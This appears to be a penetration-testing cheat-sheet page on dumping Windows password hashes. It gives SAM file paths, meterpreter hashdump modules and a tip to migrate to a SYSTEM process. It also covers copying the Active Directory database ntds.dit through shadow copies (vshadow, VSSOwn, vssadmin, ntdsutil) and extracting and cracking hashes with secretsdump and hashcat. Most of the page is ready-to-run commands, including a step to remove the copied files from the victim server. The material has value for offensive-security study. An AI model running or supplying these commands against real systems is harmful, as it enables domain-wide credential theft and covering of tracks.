Windows clients use SAM files. Windows DC uses ntds.dit to store all hashes from the domain.
SAM
C:\windows\repair\sam C:\windows\System32\config\SAM C:\windows\System32\config\RegBack\SAM
Alternatives in meterpreter:
run post/windows/gather/hashdump run post/windows/gather/smart_hashdump run hashdump hashdump (load module before: use priv) creds_all
If hashdump doesn’t work:
- Try another meterpreter shell. E.g. the PHP meterpreter shell lacks some capabilities. Try to execute a native OS meterpreter reverse shell on the victim.
- Try to migrate to another process which runs as SYSTEM. Even as an administrator, it can be that you cannot read the SAM file. But if you inject a meterpreter session as SYSTEM, then it works. (Interesting blog post)
Notes
- samdump2 can extract hashes out of Win 2000/XP/NT/Vista SAM files.
- If the file is not accessible, try hashdump in Meterpreter (if not available, load use priv before).
Format
Username : UID : LM hash : NTLM hash : : :
For hashcat, use ‑m1000 and copy the NTLM hash.
Shadow Copies
A Shadow Copy is a backup of a volume to make snapshots. If we are a (domain) admin, we can use vshadow.exe to extract sensitive files like the NTDS.dit file (the Active Directory Database File).
Prerequisites:
- Administrative privileges
Example to get the Active Directory Database file:
- Perform a shadow copy with vshadow.exe (see p61 repo to upload)
vshadow.exe -nw -p C: - Copy the ntds.dit file from the shadow copy to the “live” filesystem:
copy $addHereTheShadowCopyDeviceName\windows\ntds\ntds.dit C:\Temp - Copy the System hive from the registry:
reg.exe save hklm\system C:\Temp\system_hive.bak - Copy these two files to your own system.
- Use Impacket’s secretsdump to extract the juicy information:
impacket-secretsdump -ntds ntds.dit.bak -system system_hive.bak LOCAL - Use or/and crack the obtained credentials.
VSSown
Use VSSOwn to create a “backup” of ntds.dit. Upload it to the victim and then:
vscript vssown.vbs /status vscript vssown.vbs /start vscript vssown.vbs /create /c
Then, copy ntds.dit, SAM and SYSTEM from the backup to the attacker system:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[$SomeNumberHere]\windows\ntds\ntds.dit ntdsbackup.dit
copy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[$SomeNumberHere]\windows\system32\config\SYSTEM systembackup.bak
copy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[$SomeNumberHere]\windows\system32\config\SAM sambackup.bak
Now, use Impacket’s secretsdump.py.
VSSAdmin
Vssadmin lets manage shadow copies. On a Windows command, list all shadow copies:
vssadmin.exe list shadows
If there is no (current) one, create a new shadow copy:
vssadmin create shadow /for=c:
Execute the list command and note the number of the shadow copy. Now, copy the interesting files:
copy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy$HERETHENUMBER\windows\ntds\ntds.dit c:\temp\ntds.dit reg save hklm\system c:\temp\system /y
Now, copy both files to your local system. (And delete them from the server!) Extract the hashes:
secretsdump.py -ntds ntds.dit -system system -outputfile hashes.txt LOCAL
NTDSUtil
The ntdsutil has a “Install From Media” (IFM) feature which can be used to create a domain backup.
ntdsutil "activate instance ntds" "ifm" "create full C:\mybackup" quit quit
Then, get the files from the directory and proceed with secretsdump.py.
Leave a Reply
You must be logged in to post a comment.